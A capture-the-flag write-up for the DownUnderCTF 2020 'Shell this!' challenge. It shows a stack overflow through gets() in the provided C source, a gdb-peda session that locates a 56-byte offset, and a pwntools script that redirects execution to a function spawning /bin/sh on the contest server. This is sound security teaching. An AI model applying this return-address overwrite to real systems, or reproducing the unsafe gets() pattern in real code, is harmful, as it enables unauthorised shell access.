## Shell this! 

* **Category:** Pwn 
* **Points:** 100

### Challenge
```
Author: Faith

Somebody told me that this program is vulnerable to something called remote code execution?

I'm not entirely sure what that is, but could you please figure it out for me?

nc chal.duc.tf 30002
```

### Downloads
* [shellthis.c](shellthis.c)
* [shellthis](shellthis)

### Solution
* **Author(s):** b0uldrr
* **Date:**  18/09/20

Examining the provided source, we can see a standard `gets()` overflow vunlerability in the vuln function:

```c
#include <stdio.h>
#include <unistd.h>

__attribute__((constructor))
void setup() {
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

void get_shell() {
    execve("/bin/sh", NULL, NULL);
}

void vuln() {
    char name[40];

    printf("Please tell me your name: ");
    gets(name);
}

int main(void) {
    printf("Welcome! Can you figure out how to get this program to give you a shell?\n");
    vuln();
    printf("Unfortunately, you did not win. Please try again another time!\n");
}
```

To find the overflow amount, I used gdb-peda and a cyclical input with the following commands:

* `gdb shellthis`
* `pattern create 200 overflow.txt`
* `run < overflow.txt`
* `x/wx $rsp`

Here's a full rundown of the session:

```
gdb-peda$ pattern create 200 overflow.txt
Writing pattern of 200 chars to filename "overflow.txt"
gdb-peda$ r < overflow.txt
Starting program: /home/tmp/ctf/dowununder-ctf-2020/shell_this/shellthis < overflow.txt

Welcome! Can you figure out how to get this program to give you a shell?
Please tell me your name:

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe090 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RBX: 0x0
RCX: 0x7ffff7faf980 --> 0xfbad209b
RDX: 0x0
RSI: 0x0
RDI: 0x7ffff7fb24d0 --> 0x0
RBP: 0x4147414131414162 ('bAA1AAGA')
RSP: 0x7fffffffe0c8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
RIP: 0x400713 (<vuln+44>:       ret)
R8 : 0x7fffffffe090 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
R9 : 0x0 
R10: 0xfffffffffffff40f 
R11: 0x246 
R12: 0x4005a0 (<_start>:        xor    ebp,ebp)
R13: 0x7fffffffe1b0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40070c <vuln+37>:  call   0x400580 <gets@plt>
   0x400711 <vuln+42>:  nop
   0x400712 <vuln+43>:  leave  
=> 0x400713 <vuln+44>:  ret    
   0x400714 <main>:     push   rbp
   0x400715 <main+1>:   mov    rbp,rsp
   0x400718 <main+4>:   lea    rdi,[rip+0xe1]        # 0x400800
   0x40071f <main+11>:  call   0x400550 <puts@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe0c8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0x7fffffffe0d0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0x7fffffffe0d8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0x7fffffffe0e0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0032| 0x7fffffffe0e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0040| 0x7fffffffe0f0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0048| 0x7fffffffe0f8 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0056| 0x7fffffffe100 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400713 in vuln () at shellthis.c:19
19      }
gdb-peda$ x/wx $rsp
0x7fffffffe0c8: 0x41416341
gdb-peda$ pattern_offset 0x41416341
1094804289 found at offset: 56
```

We now know the offset to the return instruction address, we just need to overwrite it with the address of the `get_shell` function. I found its address using `objdump`:


```
$ objdump -d shellthis | grep get_shell
00000000004006ca <get_shell>:
```

This is everything we need to overwrite the buffer and execute the `get_shell` function. I wrote a python script to automate it:

```python
#!/usr/bin/python3
import pwn

local = False
if local:
    conn = pwn.process('./shellthis')
else:
    conn = pwn.remote('chal.duc.tf', 30002)
    
conn.recvuntil('name: ')

buf  = b'a' * 56                     # overflow with junk up to and including the base pointer
buf += pwn.p64(0x00000000004006ca)   # write the address of flag() over the return instruction address on the stack

conn.sendline(buf)
conn.interactive()
```

![flag](images/flag.png)

### Flag 
```
DUCTF{h0w_d1d_you_c4LL_That_funCT10n?!?!?}
```
